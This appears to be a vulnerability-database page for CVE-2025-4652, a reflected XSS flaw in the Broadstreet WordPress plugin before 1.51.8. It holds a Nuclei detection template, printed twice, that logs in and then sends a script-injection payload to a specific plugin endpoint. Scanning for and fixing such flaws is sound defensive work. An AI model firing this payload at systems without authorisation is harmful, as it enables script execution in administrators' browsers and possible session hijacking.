Broadstreet WordPress plugin - Reflected XSS

CVE-2025-4652

Verified

Description

Broadstreet WordPress plugin < 1.51.8 contains a reflected XSS caused by unsanitised and unescaped parameter output, letting attackers execute scripts against high privilege users such as admin, exploit requires victim interaction.

Severity

Medium

CVSS Score

6.1

Exploit Probability

Affected Product

broadstreet

Published Date

February 11, 2026

Template Author

sourabh-sahu

CVE-2025-4652.yaml

id: CVE-2025-4652

info:
  name: Broadstreet WordPress plugin - Reflected XSS
  author: Sourabh-Sahu
  severity: medium
  description: |
    Broadstreet WordPress plugin < 1.51.8 contains a reflected XSS caused by unsanitised and unescaped parameter output, letting attackers execute scripts against high privilege users such as admin, exploit requires victim interaction.
  impact: |
    Attackers can execute scripts in admin users' browsers, potentially leading to session hijacking or privilege abuse.
  remediation: |
    Update to version 1.51.8 or later.
  reference:
    - https://wpscan.com/vulnerability/2a18ab96-ba95-4599-824f-df12e4851e6d/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2025-4652
    cwe-id: CWE-79
    epss-score: 0.00342
    epss-percentile: 0.57388
    cpe: cpe:2.3:a:broadstreetads:broadstreet:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: broadstreetads
    product: broadstreet
  tags: cve,cve2025,broadstreetads,broadstreet,authenticated,wordpress,wp,wp-plugin,xss

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=

    matchers:
      - type: dsl
        dsl:
          - contains(header, "wordpress_logged_in")
        internal: true

  - raw:
      - |
        GET /wp-content/plugins/broadstreet/Broadstreet/Vendor/broadstreet-partner/index.php?action=register&id=123&next="/><script>alert(document.domain)</script> HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "><script>alert(document.domain)</script>","broadstreet")
        condition: and
# digest: 4a0a00473045022100f0c0718c2190b63ecd26b4f4f8afde210c06d888e24f3ec214009d6217ad838f02207ed076add6245f1bc9403fb66e4572c07a9beb15ff4e12a1eb3344e7acfb032a:922c64590222798bb761d5b6d8e72950

6.1Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

CVE ID:

cve-2025-4652

CWE ID:

cwe-79

References

https://wpscan.com/vulnerability/2a18ab96-ba95-4599-824f-df12e4851e6d/

Remediation Steps

Update to version 1.51.8 or later.

id: CVE-2025-4652

info:
  name: Broadstreet WordPress plugin - Reflected XSS
  author: Sourabh-Sahu
  severity: medium
  description: |
    Broadstreet WordPress plugin < 1.51.8 contains a reflected XSS caused by unsanitised and unescaped parameter output, letting attackers execute scripts against high privilege users such as admin, exploit requires victim interaction.
  impact: |
    Attackers can execute scripts in admin users' browsers, potentially leading to session hijacking or privilege abuse.
  remediation: |
    Update to version 1.51.8 or later.
  reference:
    - https://wpscan.com/vulnerability/2a18ab96-ba95-4599-824f-df12e4851e6d/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2025-4652
    cwe-id: CWE-79
    epss-score: 0.00342
    epss-percentile: 0.57388
    cpe: cpe:2.3:a:broadstreetads:broadstreet:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: broadstreetads
    product: broadstreet
  tags: cve,cve2025,broadstreetads,broadstreet,authenticated,wordpress,wp,wp-plugin,xss

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=

    matchers:
      - type: dsl
        dsl:
          - contains(header, "wordpress_logged_in")
        internal: true

  - raw:
      - |
        GET /wp-content/plugins/broadstreet/Broadstreet/Vendor/broadstreet-partner/index.php?action=register&id=123&next="/><script>alert(document.domain)</script> HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "><script>alert(document.domain)</script>","broadstreet")
        condition: and
# digest: 4a0a00473045022100f0c0718c2190b63ecd26b4f4f8afde210c06d888e24f3ec214009d6217ad838f02207ed076add6245f1bc9403fb66e4572c07a9beb15ff4e12a1eb3344e7acfb032a:922c64590222798bb761d5b6d8e72950

Broadstreet WordPress plugin - Reflected XSS

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

Broadstreet WordPress plugin - Reflected XSS

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps